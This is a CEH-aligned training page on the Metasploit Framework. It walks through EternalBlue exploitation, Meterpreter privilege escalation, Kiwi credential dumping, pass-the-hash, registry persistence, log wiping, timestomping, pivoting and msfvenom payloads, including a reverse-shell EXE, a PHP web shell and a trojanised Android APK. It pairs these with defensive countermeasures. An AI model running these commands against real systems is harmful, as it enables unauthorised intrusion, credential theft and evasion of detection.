Metasploit Framework

Red Team · Hard

Master Metasploit architecture, exploit selection, Meterpreter post-exploitation, network pivoting, and msfvenom payload generation — mapped to CEH exam objectives across System Hacking, Malware Threats, and Vulnerability Assessment domains.

Hard Red Team Path ⏱ 28 min read CEH Aligned

Learning Progress

What is it?

CEH DomainModule 06 — System Hacking · Module 14 — Hacking Web Applications · Module 16 — Vulnerability Analysis

The Metasploit Framework is the most widely used penetration testing platform in the world. Originally developed by HD Moore in 2003 and later acquired by Rapid7, it began as a collection of hand-coded exploits and has grown into a comprehensive, modular platform with thousands of exploit modules, auxiliary scanners, post-exploitation capabilities, and payload generation tools.

At the CEH level, Metasploit is examined across multiple domains. You are expected to understand not just how to run an exploit, but the full lifecycle it supports: from reconnaissance and vulnerability scanning through exploitation, privilege escalation, persistence, pivoting, and credential harvesting. The CEH exam tests conceptual knowledge of what Metasploit does at each phase, how its module types relate to the hacking methodology, and what defensive controls each capability bypasses or exploits.

⚠️Authorisation required: Metasploit exploits can crash services, corrupt data, and cause downtime. Never run it against systems you don't have explicit written permission to test. Unauthorised use is a federal crime under the Computer Fraud and Abuse Act (US) and equivalent laws internationally.

A Brief History and Context

Understanding where Metasploit came from matters for the CEH, because the exam frequently tests the distinction between Metasploit and other tools in the same category (Core Impact, Canvas, Cobalt Strike). Before Metasploit, exploiting a vulnerability required writing custom shellcode from scratch for each target — an activity limited to highly skilled researchers. Metasploit democratised exploitation by abstracting the low-level details into reusable modules, separating the exploit logic from the payload delivery.

This separation — exploit independent of payload — is not just an implementation detail. It is architecturally significant: the same exploit can deliver a simple command shell, a full Meterpreter agent, or a custom piece of malware depending on what the operator selects. The CEH tests this modularity explicitly because it underpins how modern malware and attack frameworks are designed.

📌 Non-Technical Analogy

Think of Metasploit like a modular lockpicking toolkit. The lock pick itself (the exploit) is designed for a specific lock model — a specific vulnerability in a specific piece of software. Once the lock is picked and the door is open, what you do next is entirely separate: you might install a security camera (persistence), copy files (exfiltration), or leave a note (proof-of-concept). The payload is what happens after the door opens. The post-exploitation modules are what you do once you're inside. Metasploit gives a skilled professional a case of precision tools for each stage, instead of requiring them to forge every tool by hand.

How it works

Metasploit Architecture

CEH ObjectiveUnderstand module types, payload architecture, and the role of each component in the attack chain

Key Module Types

Auxiliary   Scanners, fuzzers, recon -- no payload delivered
Exploits    Exploit a specific vulnerability and deliver payload
Payloads    Code executed after exploitation (Meterpreter, shells)
Post        Post-exploitation (privesc, pivoting, credential dump)
Encoders    Transform payloads to evade signature-based detection
Evasion     Generate AV-bypass payloads (Metasploit Pro feature)
NOPs        No-operation sleds used in shellcode padding

# Payload architecture (CEH exam topic):
singles     Self-contained -- entire payload in one stage, no callback
stagers     Small initial payload -- opens channel, fetches next stage
stages      Full payload (e.g. Meterpreter) delivered by the stager

The CEH exam specifically tests the distinction between singles, stagers, and stages. The notation in Metasploit makes this explicit: windows/shell_reverse_tcp is a single (self-contained); windows/shell/reverse_tcp is a staged payload — the slash after the platform indicates a stager/stage pair. This distinction matters for operational reasons: staged payloads are smaller and harder to detect initially, but require a callback to retrieve the second stage, which can be blocked by egress filtering.

The Metasploit Attack Phase Model

The CEH maps system hacking into five sequential phases: Gaining Access, Escalating Privileges, Maintaining Access, Executing Applications, and Hiding Files. Metasploit provides purpose-built capabilities for every one of these phases. Understanding which module type maps to which phase is a direct exam objective.

Phase 1

Recon

Auxiliary scanners, db_nmap, smb_version

Phase 2

Exploitation

Exploit modules + payload selection

Phase 3

Privilege Esc.

getsystem, local exploit suggester

Phase 4

Persistence

Post modules, metsvc, registry keys

Phase 5

Pivoting

Route, Socks proxy, port forwarding

The Database Backend

Metasploit integrates with PostgreSQL to store scan results, discovered hosts, credentials, and session history across engagements. This is tested on the CEH because it relates to the concept of maintaining state across a pentest — a professional engagement doesn't restart from scratch each session.

Database Workflow

# Initialise and connect the database:
msfdb init
msfconsole -q
db_status
[*] Connected to msf. Connection type: postgresql.

# Import nmap results directly into MSF workspace:
db_nmap -sV -O 192.168.1.0/24
hosts
address        os_name          purpose
192.168.1.15   Windows Server   server
192.168.1.20   Linux            server
vulns
# Any discovered vulnerabilities are stored and searchable here

Examples

Metasploit in Practice

Example 01Service enumeration with auxiliary modules

Before exploiting, use auxiliary scanners to identify vulnerability candidates across a target range. CEH exam note: auxiliary modules are the correct choice for non-destructive pre-exploitation scanning — they gather information without delivering a payload.

msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
set THREADS 10
run
[+] 192.168.1.15 - Host is likely VULNERABLE to MS17-010! (EternalBlue)
[*] 192.168.1.10 - Host is NOT vulnerable

Example 02Exploiting a vulnerable service

Select the exploit, configure target and payload, execute to gain a Meterpreter session. The LHOST and LPORT define where the payload calls back — the attacker's listener address and port.

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.15
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
[*] Sending stage to 192.168.1.15
[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer: WIN-SERVER01  OS: Windows Server 2016

Example 03Meterpreter post-exploitation

Meterpreter provides a powerful post-exploitation shell with built-in commands for privilege escalation and credential dumping. CEH exam note: getsystem attempts multiple privilege escalation techniques automatically; load kiwi loads the Mimikatz-derived credential harvesting module.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
meterpreter > creds_all
Administrator: Password1  (plaintext from LSASS)

Example 04Network pivoting through a compromised host

Use a compromised host to route traffic to network segments not directly reachable from the attacker machine. This is a core CEH exam concept — pivoting is how attackers move from the DMZ to internal networks.

meterpreter > ipconfig
Interface 1: 192.168.1.15  (attacker-reachable)
Interface 2: 10.10.10.15  (internal -- attacker cannot reach directly)
meterpreter > background
route add 10.10.10.0/24 1   # Route through session 1
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
[+] 10.10.10.5 - 10.10.10.5:445 - TCP OPEN  (internal DC!)

Example 05msfvenom custom payload generation

msfvenom creates standalone payloads for delivery via phishing, USB drops, or web shells. CEH exam note: msfvenom is tested under both the Malware Threats domain and the System Hacking domain — it bridges the two.

# Windows reverse Meterpreter EXE:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
# PHP web shell for upload to vulnerable server:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# Catch connections in msfconsole:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run -j

Key Concepts

What You Need to Know

🧰

Exploit vs Auxiliary

Auxiliary modules scan and enumerate without payloads. Exploits deliver payloads and create sessions. Always recon with auxiliary before selecting an exploit module.

📱

Meterpreter

An advanced in-memory payload with extensive post-exploitation -- file system access, privilege escalation, credential dumping, pivoting, screenshot capture, and keylogging.

➡️

Pivoting

Route module traffic through a Meterpreter session to reach otherwise inaccessible network segments. Essential for internal network exploration from an internet-facing compromise.

💊

msfvenom

Standalone payload generator -- creates EXEs, scripts, web shells, and shellcode. Used to create payloads for delivery outside the direct Metasploit session flow.

CEH — System Hacking

The Five Phases of System Hacking

CEH DomainModule 06 — System Hacking: Gaining Access, Escalating Privileges, Maintaining Access, Executing Applications, Hiding Files

The CEH exam organises system hacking around five sequential phases, and Metasploit provides capabilities at every stage. Understanding this mapping is essential — the exam will present scenarios and ask which tool or technique is appropriate for a given phase. Mixing up which phase a technique belongs to is a common source of incorrect answers.

Phase 1 — Gaining Access

This phase encompasses everything up to the first foothold: password cracking, exploitation of vulnerabilities, and bypassing authentication. The CEH distinguishes between several sub-techniques:

Password cracking: Metasploit's auxiliary modules include online password brute-forcers for services like SSH, SMB, FTP, and web forms. The scanner/ssh/ssh_login module automates credential stuffing against SSH services.
Vulnerability exploitation: The exploit module library is directly applicable here. The CEH tests knowledge of exploit types — remote exploits (network-delivered), local exploits (require existing access), client-side exploits (require the victim to execute something), and web application exploits.
Buffer overflow: The CEH includes buffer overflow as a tested concept. Metasploit was historically built around buffer overflow exploits, and the exam may ask about stack-based vs. heap-based overflows, NOP sleds, and how shellcode payloads are structured.

📌 Non-Technical Analogy — Buffer Overflow

Imagine filling out a paper form that has a box labeled "Name" with space for 20 characters. If you write 40 characters, the overflow spills into the adjacent box — which might be "Authorized: Yes/No." A buffer overflow exploit does the same thing in memory: it writes more data than the program allocated space for, and the overflow lands in memory regions that control program execution. By carefully crafting the overflow content, an attacker can overwrite the instruction pointer — the equivalent of changing the "what do I do next" address in memory — and redirect execution to their own shellcode.

Phase 2 — Escalating Privileges

Initial access rarely provides the highest level of privilege. Privilege escalation (privesc) is the process of moving from a limited user account to a more powerful one — ideally SYSTEM on Windows or root on Linux. This is a heavily tested CEH topic.

Metasploit's getsystem command attempts several automatic privilege escalation techniques. The CEH exam tests the underlying techniques it uses, not just the command:

Named Pipe Impersonation: A technique that exploits how Windows handles inter-process communication. A low-privilege process creates a named pipe; when a higher-privilege process connects to it, the low-privilege process can steal that process's token. Metasploit attempts this first.
Token impersonation (Incognito / token kidnapping): Windows processes carry security tokens that represent their privileges. Meterpreter's incognito module can list available tokens in memory and impersonate a SYSTEM-level token even after the original process has exited.
Local kernel exploits: When automatic techniques fail, the post/multi/recon/local_exploit_suggester module checks the target system against a list of known local privilege escalation exploits and recommends the most likely to succeed.

Example 06Local Exploit Suggester — Automated Privesc Identification

When getsystem fails, use the local exploit suggester to find applicable kernel or service-level exploits based on the target's OS version and patch level.

meterpreter > background
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
[*] 192.168.1.15 - Collecting local exploits for x64/windows...
[+] exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[+] exploit/windows/local/bypassuac_fodhelper
# Select a suggested exploit and run against session 1
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
run
[*] Meterpreter session 2 opened  (elevated)

Phase 3 — Executing Applications

With elevated privileges, an attacker can install software, schedule tasks, and execute code. On the CEH, this phase maps to techniques like deploying keyloggers, screen capture tools, and remote access trojans. Meterpreter has built-in capabilities for all of these — without writing additional files to disk.

Application Execution via Meterpreter

# Keylogger (in-memory, no file on disk):
meterpreter > keyscan_start
meterpreter > keyscan_dump
Keystrokes captured: "password123\r\nconfirm: password123\r\n"

# Screenshot capture:
meterpreter > screenshot
Screenshot saved to /tmp/screenshot.jpeg

# Execute a command on the remote system:
meterpreter > execute -f cmd.exe -i -H
# -i = interactive, -H = hidden window

Phase 4 — Maintaining Access

Persistence is how attackers ensure they can return to a compromised system even after reboots or credential changes. The CEH tests both the concept and the defensive countermeasures. Metasploit provides several persistence mechanisms, from registry-based autorun entries to scheduled tasks and service installation.

🔴CEH Exam Focus: The CEH specifically tests the difference between backdoors, trojans, and rootkits under the Maintaining Access and Malware Threats domains. Understanding how Metasploit's persistence modules relate to each malware category is a direct exam objective.

Example 07Persistence via Registry Autorun

Install a Meterpreter payload that survives reboots using a Windows registry autorun key — a classic persistence mechanism tested directly on the CEH exam.

meterpreter > run post/windows/manage/persistence
[*] Running Persistence on WIN-SERVER01 via session 1
[+] Persistent agent installed at C:\Users\Admin\AppData\svchost32.exe
[+] Agent registered in HKCU\Software\Microsoft\Windows\CurrentVersion\Run

# The agent will now auto-start on every user login.
# Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# Value: svchost32.exe (mimics a legitimate Windows process name)

Notice the use of svchost32.exe as the filename — this is a common attacker technique called process masquerading, where malware names itself after legitimate Windows processes to evade casual inspection. The real Windows process is svchost.exe; the addition of "32" is intended to look plausible at a glance.

Phase 5 — Clearing Tracks / Hiding Files

The final phase of the system hacking cycle involves covering evidence of the intrusion. The CEH tests knowledge of log manipulation, timestomping, and steganography. Meterpreter provides several relevant capabilities.

Anti-Forensics Techniques via Meterpreter

# Clear Windows Event Logs:
meterpreter > clearev
[*] Wiping 997 records from the Application log.
[*] Wiping 1,022 records from the System log.
[*] Wiping 3,782 records from the Security log.

# Timestomping -- modify file timestamps to confuse forensics:
meterpreter > timestomp C:\\payload.exe -z "01/01/2018 08:00:00"
[*] Setting specific MACE attributes on C:\payload.exe

# MACE = Modified, Accessed, Created, Entry Modified timestamps
# Changing these makes the malware appear to be 6-year-old system file

Meterpreter Deep Dive

Why Meterpreter Is Different

CEH ObjectiveUnderstand in-memory payload operation, fileless malware concepts, and post-exploitation capability scope

The CEH exam tests Meterpreter specifically because it represents a category of attack technique — the in-memory, fileless payload — that has become standard in modern intrusions and that traditional AV is notoriously poor at detecting. Understanding why Meterpreter is hard to detect is as important for the exam as knowing what it can do.

Why Meterpreter Is Hard to Detect

Traditional malware writes an executable file to disk. Antivirus software can scan that file and match it against known signatures. Meterpreter is designed to avoid this entirely:

Runs entirely in memory: After the stager executes, Meterpreter loads itself into the memory space of an existing process (like explorer.exe or svchost.exe) and never writes itself to disk. There is no file for antivirus to scan.
Encrypted communications: All traffic between the Meterpreter agent and the Metasploit listener is encrypted (TLS by default), making network-based detection difficult without SSL inspection.
Process migration: Meterpreter can migrate itself from an unstable process into a long-lived one, ensuring persistence even if the original exploited process crashes.
Extension loading: Capabilities like Kiwi (credential dumping) and Incognito (token impersonation) are loaded as extensions only when needed — they don't exist in the initial payload footprint at all.

📌 Non-Technical Analogy — Fileless Malware

Imagine a spy who never carries any spy equipment. Instead of smuggling in a camera, they memorise everything they see. Instead of stealing documents, they read them and recite the contents from memory later. A security guard checking bags at the entrance will find nothing — because nothing is being carried. Meterpreter operates the same way: it lives entirely in the computer's RAM (short-term memory), never writing itself to the hard drive (long-term storage). When the computer restarts, the RAM is cleared and Meterpreter is gone — which is why persistence modules are needed to reload it.

Meterpreter and Credential Harvesting

The load kiwi command in Meterpreter loads a port of Mimikatz — one of the most important credential harvesting tools in existence, and a heavily tested CEH topic under both System Hacking and Sniffing domains. Understanding what Kiwi/Mimikatz can extract and why requires understanding how Windows handles authentication credentials.

Windows stores authentication data in a process called LSASS (Local Security Authority Subsystem Service). LSASS caches credentials in memory so users don't have to re-enter passwords constantly. In older Windows versions (pre-Windows 8.1 / 2012 R2), this cache included plaintext passwords. In newer versions, only hashes are stored by default — but those hashes can often still be used directly in Pass-the-Hash attacks.

Kiwi Credential Extraction

meterpreter > load kiwi
Loading extension kiwi...

# Dump all cached credentials:
meterpreter > creds_all
Username   Domain    Password / Hash
--------   ------    ----------------
Admin      CORP      Password1! (plaintext - legacy WDigest)
svc_sql    CORP      aad3b435b51404eeaad3b435b51404ee:abc123hash (NTLM)

# The NTLM hash can be used directly in Pass-the-Hash:
# No need to crack the password -- authenticate with the hash itself
use exploit/windows/smb/psexec
set SMBPass aad3b435b51404eeaad3b435b51404ee:abc123hash
run
[*] Meterpreter session 3 opened (lateral movement via PtH)

🟣CEH Exam — Pass-the-Hash: Pass-the-Hash (PtH) is a direct CEH exam objective. The exam tests the concept that NTLM authentication does not require the plaintext password — the hash itself is the credential. Attacks that steal hashes without cracking them and use them to authenticate directly are PtH attacks. Metasploit's psexec module is the canonical tool for executing PtH in practice.

Payloads and Evasion

msfvenom, Encoders, and AV Evasion

CEH DomainModule 08 — Malware Threats · Module 17 — Hacking Mobile Platforms · Module 18 — IoT Hacking

msfvenom is the payload generation component of Metasploit — it replaced the older msfpayload and msfencode tools, combining them into a single utility. On the CEH exam, msfvenom is tested under both the Malware Threats domain (creating trojans and backdoors) and the System Hacking domain (delivering initial access payloads).

Output Formats

One of the most tested aspects of msfvenom on the CEH is the range of output formats — the -f flag. The format determines how the payload is packaged for delivery:

exe / exe-service: Windows executable or service binary. Classic trojan delivery via email attachment or USB drop.
elf: Linux executable. Used for Linux targets, IoT devices, or Android.
apk: Android package. The CEH mobile hacking domain tests this specifically — msfvenom can inject a Meterpreter payload into a legitimate Android APK.
raw / c / python / ruby: Shellcode output in various formats. Used when embedding payloads into existing programs or scripts.
hta-psh / vba / vba-psh: HTML Application or Visual Basic for Applications formats for phishing-based delivery. A malicious Word macro or HTA file that executes msfvenom shellcode when opened.
psh (PowerShell): A PowerShell one-liner that, when executed, fetches and runs the Meterpreter stage in memory — a common fileless delivery technique.

Example 08Android APK Payload Injection

CEH Mobile Hacking domain objective: embedding a Meterpreter backdoor in a legitimate Android application. The resulting APK has all the functionality of the original app plus a hidden Meterpreter agent.

# Inject payload into a legitimate app (e.g. a game APK):
msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -x legitimate_app.apk \
  -o trojan_app.apk
[*] Using template: legitimate_app.apk
[*] Payload size: 10215 bytes
[*] Saved as: trojan_app.apk

# When victim installs trojan_app.apk and grants permissions:
# - Access to SMS, contacts, camera, microphone
# - GPS location tracking
# - Full filesystem access
# - Same Meterpreter post-exploitation interface

Encoders and AV Evasion

Metasploit's encoder modules transform a payload so that its byte pattern no longer matches known antivirus signatures. The CEH tests encoder concepts heavily — both what they do and their limitations. The most important encoder to know for the exam is shikata_ga_nai ("it cannot be helped" in Japanese), a polymorphic XOR additive feedback encoder that was the gold standard for years.

⚠️CEH Exam Concept — Polymorphic vs Metamorphic: The CEH distinguishes between polymorphic malware (the code mutates but uses a fixed decryption stub) and metamorphic malware (the entire code rewrites itself on each iteration, no fixed stub). Metasploit's encoders produce polymorphic payloads. Modern AV catches most encoder outputs because the decryption stub itself has become a known signature — which is why the exam also covers sandbox evasion and packers as more advanced techniques.

Encoding to Evade Signature Detection

# Generate payload with 5 encoding iterations:
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_payload.exe
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 412 (iteration=0)
...
x86/shikata_ga_nai succeeded with size 509 (iteration=4)

# Each iteration changes the byte signature.
# More iterations = harder to detect with static AV,
# but the technique is well-known to modern behavioural AV.

The Limits of Evasion — Why Encoders Alone Are Not Enough

A common misconception — and a likely CEH trap question — is that encoding a payload makes it undetectable. Modern endpoint detection and response (EDR) tools use behavioural analysis, not just signatures. They watch what the payload does after it executes: does it inject into another process? Does it make suspicious network connections? Does it access LSASS? These behavioural indicators are triggered regardless of how the payload was encoded.

The CEH exam tests this distinction because it relates to the broader question of why organisations need layered defenses — signature-based AV addresses a different threat model than behavioural EDR, which addresses a different threat model than network monitoring.

Lateral Movement

Pivoting, Port Forwarding, and Lateral Movement

CEH ObjectiveModule 06 — System Hacking: Lateral movement, pass-the-hash, pivoting through internal segments

Pivoting is one of the most conceptually important topics in CEH system hacking, and one where students frequently have conceptual gaps. The core idea: once you compromise a host that sits between two network segments, you can use that host as a proxy to attack the segment you couldn't originally reach.

📌 Non-Technical Analogy — Network Pivoting

Imagine you're trying to access a private members-only club. You can't get in from the street — there's a wall and a guarded gate. But you notice that the coffee shop next door has a shared courtyard with the club. If you can get into the coffee shop (the internet-facing server), you can slip through the courtyard into the club (the internal network) without ever going through the guarded gate (the firewall). The coffee shop is your pivot point. You aren't attacking the club directly from the street — you're using a trusted intermediary that already has access.

Three Pivoting Techniques in Metasploit

The CEH tests the distinction between the different pivoting approaches available. Each has different use cases and tradeoffs:

Route-Based Pivoting

Uses Metasploit's internal routing table to send module traffic through an active session. Works for Metasploit module traffic only — external tools can't use it.

route add 10.0.0.0/8 [session_id] — all Metasploit traffic to that subnet flows through the session.

SOCKS Proxy Pivot

Creates a SOCKS4/5 proxy server on the attacker machine that tunnels traffic through a Meterpreter session. External tools (nmap, browsers, Burp Suite) can be configured to use it via proxychains.

use auxiliary/server/socks_proxy — exposes a local SOCKS listener that tunnels through the session.

Port Forwarding

Forwards a specific port on the attacker machine to a specific port on an internal host, through the pivot. Precise — one connection at a time, but very reliable.

meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.5 — local port 3389 forwards to the internal host's RDP.

SSH Tunneling (via Metasploit)

If the pivot host has SSH access, Metasploit's post modules can set up dynamic SSH tunnels — combining SSH's native tunneling with Metasploit session management.

Tested on CEH as a comparison technique to Metasploit's native routing.

Example 09Full Pivot Chain — Internet to Internal Domain Controller

A complete lateral movement scenario from initial internet-facing compromise to internal domain controller access — demonstrating the full value of Metasploit's pivoting capabilities.

--- STEP 1: Exploit internet-facing host ---
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [internet_facing_ip]
exploit
[*] Meterpreter session 1 opened

--- STEP 2: Discover internal network interface ---
meterpreter > ipconfig
10.0.1.50 (internal segment -- not directly reachable)
meterpreter > background

--- STEP 3: Add route through session ---
route add 10.0.1.0/24 1

--- STEP 4: Scan internal segment for Domain Controller ---
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.1.0/24
run
[+] 10.0.1.10 - Likely VULNERABLE (EternalBlue) -- DC01

--- STEP 5: Exploit internal DC through pivot ---
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.1.10
set PAYLOAD windows/x64/meterpreter/bind_tcp
# bind_tcp (vs reverse_tcp) because the DC can't reach back to us
# directly -- the payload listens on the DC, we connect to it via pivot
exploit
[*] Meterpreter session 2 opened (Domain Controller!)

🟣CEH Exam — Reverse vs Bind Payloads: The distinction between reverse_tcp (target connects back to attacker) and bind_tcp (attacker connects to listener on target) is a direct CEH exam objective. Reverse payloads are preferred because they bypass firewalls that block inbound connections. Bind payloads are necessary when the target cannot route back to the attacker — as in a pivoted internal-network target.

Security Implications

What Metasploit Reveals About Network Defenses

CEH DomainModule 11 — Session Hijacking · Module 12 — Evading IDS, Firewalls, and Honeypots · Module 14 — Hacking Web Apps

Metasploit is not just an offensive tool — studying how it works reveals the specific gaps in defensive architectures that allow each technique to succeed. For the CEH, understanding the defense side is as important as the offense side. Every attack technique in the exam objectives has a corresponding defensive control.

What Unpatched Systems Actually Mean

The EternalBlue exploit (MS17-010) used throughout these examples was patched by Microsoft in March 2017. The WannaCry ransomware attack — one of the most damaging cyberattacks in history — occurred in May 2017, just two months later, and used the same exploit against unpatched systems. The lesson for network administrators and for the CEH exam is stark: an unpatched vulnerability with a public exploit is not a theoretical risk. It is a time-limited certainty.

Metasploit's module library gives practical weight to what "unpatched CVE" means. When a security professional can demonstrate that a missing patch allows full SYSTEM-level access in under two minutes, patch management stops being a compliance checkbox and becomes an urgent operational priority.

HypotheticalThe Segmented Network That Wasn't

A mid-sized manufacturing company believes their operational technology (OT) network — containing industrial control systems — is properly isolated from their IT network. A firewall separates the two segments, and the policy is that no traffic should cross between them.

During a penetration test, the team compromises a Windows server in the IT environment using EternalBlue. That server turns out to be a jump host used by IT staff to occasionally access the OT network for maintenance. It has two network interfaces — one in the IT segment, one in the OT segment. The firewall rules were never applied to traffic originating from this host.

Using Metasploit's routing and pivot capabilities, the red team scans and gains access to the OT network entirely through the compromised jump host — without triggering any firewall alerts, because the traffic originated from a trusted internal host. The "segmented" network was only segmented from external traffic; internal lateral movement was never accounted for.

This scenario illustrates a CEH exam principle: network segmentation is only effective if it accounts for the lateral movement path that follows an internal compromise. An attacker who is already inside the IT network must be stopped from crossing into the OT network — and that requires controls beyond just a perimeter firewall.

Countermeasures — Defense Mapped to Each Attack Phase

The CEH exam explicitly tests countermeasures for each system hacking phase. The following maps each Metasploit capability to its primary defensive control:

Attack: EternalBlue / Remote Exploitation

Defense: Timely patch management; disable SMBv1 at the OS and firewall level; network segmentation to limit SMB reachability across segments.

Attack: Meterpreter (Fileless, In-Memory)

Defense: Behavioural EDR (not signature AV); memory scanning; PowerShell constrained language mode; application whitelisting (AppLocker).

Attack: Credential Harvesting (Kiwi/Mimikatz)

Defense: Windows Credential Guard (virtualisation-based security isolates LSASS); disable WDigest authentication; protect LSASS with RunAsPPL.

Attack: Pass-the-Hash

Defense: Enforce Kerberos authentication (PtH is NTLM-specific); implement privileged access workstations (PAW); Local Administrator Password Solution (LAPS) to randomise local admin passwords per host.

Attack: Persistence (Registry Autorun)

Defense: Endpoint monitoring of registry run keys; application whitelisting to block unauthorised executables; file integrity monitoring on startup locations.

Attack: Pivoting / Lateral Movement

Defense: Micro-segmentation; host-based firewalls blocking lateral SMB; privileged access management (PAM) to limit which accounts can move laterally; network traffic anomaly detection.

✅CEH Defensive Principle: The CEH exam distinguishes between preventive, detective, and corrective controls. Patch management is preventive — it stops the exploit working. EDR is detective — it identifies when an exploit runs. Incident response is corrective — it addresses the damage after compromise. A complete security architecture requires all three, because no preventive control is perfect.

Intrusion Detection and Metasploit

The CEH Module 12 tests evasion of IDS and firewalls. Metasploit has specific capabilities relevant to this, and students are expected to understand both the technique and the signature the technique produces:

Fragmented packets: Metasploit can fragment payloads across multiple packets, which may slip past IDS systems that don't reassemble streams before inspection. Modern next-gen firewalls reassemble streams; legacy IDS may not.
Port hopping: Meterpreter can be configured to communicate on uncommon ports or cycle through ports, evading port-based firewall rules.
HTTPS C2: Using port 443 and TLS encryption, Meterpreter traffic is indistinguishable from normal web browsing without SSL inspection — a configuration many organisations don't implement due to complexity and privacy concerns.
DNS-based C2: Some Meterpreter transport options use DNS for command and control, hiding traffic in DNS queries that most firewalls permit by default and few organisations inspect.

CEH Reference

Exam Quick Reference — Metasploit Topics

🟣CEH Exam Strategy: Metasploit questions on the CEH tend to test conceptual understanding over syntax. Expect questions like "Which Metasploit module type delivers no payload?" (Auxiliary), "What technique allows authentication using a captured hash without cracking it?" (Pass-the-Hash), and "What Meterpreter command escalates to SYSTEM automatically?" (getsystem). Know the concepts; the syntax follows naturally.

🧰

Exploit vs Auxiliary

Auxiliary = no payload, recon only. Exploit = delivers payload and opens session. CEH will ask which is appropriate for scanning vs. exploitation phases.

📱

Meterpreter

In-memory, fileless, encrypted. Loaded into a host process. Tested under System Hacking and Malware Threats. Key commands: getsystem, load kiwi, migrate, clearev, timestomp.

➡️

Pivoting

Route (MSF-only), SOCKS proxy (all tools), portfwd (single port). Reverse payload = target calls back. Bind payload = attacker connects in. Know when to use each.

💊

msfvenom

-p = payload, -f = format, -e = encoder, -i = iterations, -x = template app injection, -o = output file. Know the APK injection technique for mobile domain.

🔑

Pass-the-Hash

NTLM-specific. Captured hash used directly for auth — no cracking. psexec module. Defense: Kerberos enforcement, LAPS, Credential Guard.

🧬

Payload Types

Singles (self-contained, no stager), Stagers (small, pulls stage), Stages (full payload). Staged = slash notation: windows/meterpreter/reverse_tcp.

🎭

Encoders

shikata_ga_nai = polymorphic XOR. Evades static AV signatures. Does NOT evade behavioural EDR. CEH distinguishes polymorphic (fixed stub) vs metamorphic (full rewrite).

🕵️

Anti-Forensics

clearev = wipe event logs. timestomp = alter MACE timestamps. Relevant to CEH Covering Tracks phase. Defense: SIEM with centralised log shipping (can't be wiped locally).

Ready to put it into practice?

Proceed to the Lab

You've covered the theory. Now apply it hands-on in the simulated environment.

Start Lab — Metasploit Framework →
← Return to all labs